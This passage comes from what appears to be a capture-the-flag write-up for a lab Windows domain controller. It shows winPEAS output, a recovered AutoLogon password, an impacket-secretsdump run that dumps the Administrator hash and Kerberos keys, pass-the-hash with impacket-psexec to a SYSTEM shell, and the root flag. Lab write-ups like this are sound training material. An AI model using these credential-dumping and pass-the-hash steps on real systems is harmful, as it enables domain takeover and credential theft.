ÉÍÍÍÍÍÍÍÍÍÍ¹ Recently run commands
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for DPAPI Master Keys
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi>
    MasterKey: C:\\Users\\FSmith\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-2966785786-3096785034-1186376766-1105\\ca6bc5b5-57d3-4f19-9f5a-3016d1e57c8f
    Accessed: 1/24/2020 6:30:19 AM
    Modified: 1/24/2020 6:30:19 AM
   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for DPAPI Credential Files
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#dpapi>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Checking for RDCMan Settings Files
È Dump credentials from Remote Desktop Connection Manager <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager>                                                                                                                               
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Kerberos tickets
È  <https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-kerberos-88/index.html>
  [X] Exception: Object reference not set to an instance of an object.
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for saved Wifi credentials
  [X] Exception: Unable to load DLL 'wlanapi.dll': The specified module could not be found. (Exception from HRESULT: 0x8007007E)
Enumerating WLAN using wlanapi.dll failed, trying to enumerate using 'netsh'
No saved Wifi credentials found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking AppCmd.exe
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#appcmdexe>
    AppCmd.exe was found in C:\\Windows\\system32\\inetsrv\\appcmd.exe
      You must be an administrator to run this check

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking SSClient.exe
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#scclient--sccm>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating SSCM - System Center Configuration Manager settings

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Security Packages Credentials
  [X] Exception: Couldn't parse nt_resp. Len: 0 Message bytes: 4e544c4d535350000300000001000100620000000000000063000000000000005800000000000000580000000a000a00580000000000000063000000058a80a20a0063450000000fea09ea610b953c6748104fea3e90e3495300410055004e00410000                                                     

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Browsers Information ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Firefox
    Info: if no credentials were listed, you might need to close the browser and try again.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Firefox DBs
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in Firefox history
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Chrome
    Info: if no credentials were listed, you might need to close the browser and try again.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Chrome DBs
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in Chrome history
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Chrome bookmarks
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Opera
    Info: if no credentials were listed, you might need to close the browser and try again.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Brave Browser
    Info: if no credentials were listed, you might need to close the browser and try again.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Showing saved credentials for Internet Explorer (unsupported)
    Info: if no credentials were listed, you might need to close the browser and try again.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Current IE tabs
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history>
  [X] Exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.Runtime.InteropServices.COMException: The server process could not be started because the configured identity is incorrect. Check the username and password. (Exception from HRESULT: 0x8000401A)                                                                                                                                                  
   --- End of inner exception stack trace ---                                                                                                                
   at System.RuntimeType.InvokeDispMethod(String name, BindingFlags invokeAttr, Object target, Object[] args, Boolean[] byrefModifiers, Int32 culture, String[] namedParameters)                                                                                                                                          
   at System.RuntimeType.InvokeMember(String name, BindingFlags bindingFlags, Binder binder, Object target, Object[] providedArgs, ParameterModifier[] modifiers, CultureInfo culture, String[] namedParams)                                                                                                              
   at winPEAS.KnownFileCreds.Browsers.InternetExplorer.GetCurrentIETabs()                                                                                    
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for GET credentials in IE history
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#browsers-history>

ÉÍÍÍÍÍÍÍÍÍÍ¹ IE history -- limit 50
                                                                                                                                                             
    <http://go.microsoft.com/fwlink/p/?LinkId=255141>

ÉÍÍÍÍÍÍÍÍÍÍ¹ IE favorites
    Not Found

ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¹ Interesting files and registry ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ

ÉÍÍÍÍÍÍÍÍÍÍ¹ Putty Sessions
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Putty SSH Host keys
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ SSH keys in registry
È If you find anything here, follow the link to learn how to decrypt the SSH keys <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#ssh-keys-in-registry>                                                                                                                    
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ SuperPutty configuration files

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Office 365 endpoints synced by OneDrive.
                                                                                                                                                             
    SID: S-1-5-19
   =================================================================================================

    SID: S-1-5-20
   =================================================================================================

    SID: S-1-5-21-2966785786-3096785034-1186376766-1105
   =================================================================================================

    SID: S-1-5-18
   =================================================================================================

ÉÍÍÍÍÍÍÍÍÍÍ¹ Cloud Credentials
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Unattend Files

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for common SAM & SYSTEM backups

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for McAfee Sitelist.xml Files

ÉÍÍÍÍÍÍÍÍÍÍ¹ Cached GPP Passwords

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for possible regs with creds
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#inside-the-registry>
    Not Found
    Not Found
    Not Found
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for possible password files in users homes
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials>
    C:\\Users\\All Users\\Microsoft\\UEV\\InboxTemplates\\RoamingCredentialSettings.xml

ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching for Oracle SQL Developer config files
                                                                                                                                                             

ÉÍÍÍÍÍÍÍÍÍÍ¹ Slack files & directories
  note: check manually if something is found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for LOL Binaries and Scripts (can be slow)
È  <https://lolbas-project.github.io/>
   [!] Check skipped, if you want to run it, please specify '-lolbas' argument

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating Outlook download files
                                                                                                                                                             

ÉÍÍÍÍÍÍÍÍÍÍ¹ Enumerating machine and user certificate files
                                                                                                                                                             

ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching known files that can contain creds in home
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials>

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for documents --limit 100--
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Office Most Recent Files -- limit 50
                                                                                                                                                             
  Last Access Date           User                                           Application           Document

ÉÍÍÍÍÍÍÍÍÍÍ¹ Recent files --limit 70--
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking inside the Recycle Bin for creds files
È  <https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#files-and-registry-credentials>
    Not Found

ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching hidden files or folders in C:\\Users home (can be slow)
                                                                                                                                                             
     C:\\Users\\Default
     C:\\Users\\All Users
     C:\\Users\\All Users\\ntuser.pol
     C:\\Users\\All Users\\RICOH_DRV\\RICOH Aficio SP 8300DN PCL 6\\utne7z\\FileCache_DrvDeviceCapabilites
     C:\\Users\\All Users\\RICOH_DRV\\RICOH Aficio SP 8300DN PCL 6\\_common
     C:\\Users\\All Users\\RICOH_DRV\\RICOH Aficio SP 8300DN PCL 6
     C:\\Users\\All Users\\RICOH_DRV\\RICOH Aficio SP 8300DN PCL 6\\do_not_delete_folders
     C:\\Users\\Default User
     C:\\Users\\Default
     C:\\Users\\All Users

ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching interesting files in other users home directories (can be slow)
                                                                                                                                                             
  [X] Exception: Object reference not set to an instance of an object.

ÉÍÍÍÍÍÍÍÍÍÍ¹ Searching executable files in non-default folders with write (equivalent) permissions (can be slow)
     File Permissions "C:\\Users\\FSmith\\Desktop\\winPEASany.exe": FSmith [Allow: AllAccess]

ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for Linux shells/distributions - wsl.exe, bash.exe

       /---------------------------------------------------------------------------------\\                                                                   
       |                             Do you like PEASS?                                  |                                                                   
       |---------------------------------------------------------------------------------|                                                                   
       |         Learn Cloud Hacking       :     training.hacktricks.xyz                 |                                                                   
       |         Follow on Twitter         :     @hacktricks_live                        |                                                                   
       |         Respect on HTB            :     SirBroccoli                             |                                                                   
       |---------------------------------------------------------------------------------|                                                                   
       |                                 Thank you!                                      |                                                                   
       \\---------------------------------------------------------------------------------/ 
```

{% endcode %}

### SVC\_LOANMANAGER logon credentials

```bash
ÉÍÍÍÍÍÍÍÍÍÍ¹ Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultDomainName             :  EGOTISTICALBANK
    DefaultUserName               :  EGOTISTICALBANK\\svc_loanmanager
    DefaultPassword               :  Moneymakestheworldgoround!
```

### Administrator Hash

![](/files/QwdHPtsuMHGLIVyCUZO4)

{% code overflow="wrap" expandable="true" %}

```bash
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ impacket-secretsdump egotistical-bank/svc_loanmgr@10.129.95.180 -just-dc-user Administrator 
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

Password:
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
[*] Cleaning up... 

```

{% endcode %}

> Pass the Hash is now ready

{% code overflow="wrap" expandable="true" %}

```bash
┌──(kali㉿kali)-[/usr/share/doc/python3-impacket/examples]
└─$ impacket-psexec egotistical-bank.local/administrator@10.129.95.180 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on 10.129.95.180.....
[*] Found writable share ADMIN$
[*] Uploading file NQVbWXjP.exe
[*] Opening SVCManager on 10.129.95.180.....
[*] Creating service YdcJ on 10.129.95.180.....
[*] Starting service YdcJ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.973]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows\\system32> whoami
nt authority\\system
```

{% endcode %}

## Root.txt

{% code overflow="wrap" expandable="true" %}

```bash
 
C:\\Users\\Administrator\\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is 489C-D8FC

 Directory of C:\\Users\\Administrator\\Desktop

07/14/2021  03:35 PM    <DIR>          .
07/14/2021  03:35 PM    <DIR>          ..
07/18/2025  12:13 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   7,772,749,824 bytes free

C:\\Users\\Administrator\\Desktop> type root.txt
b6696d3423fe73513b0d912a0fa8f162

C:\\Users\\Administrator\\Desktop> 
```

{% endcode %}

![](/files/R29hMlLvwVUaWkPjzKVK)
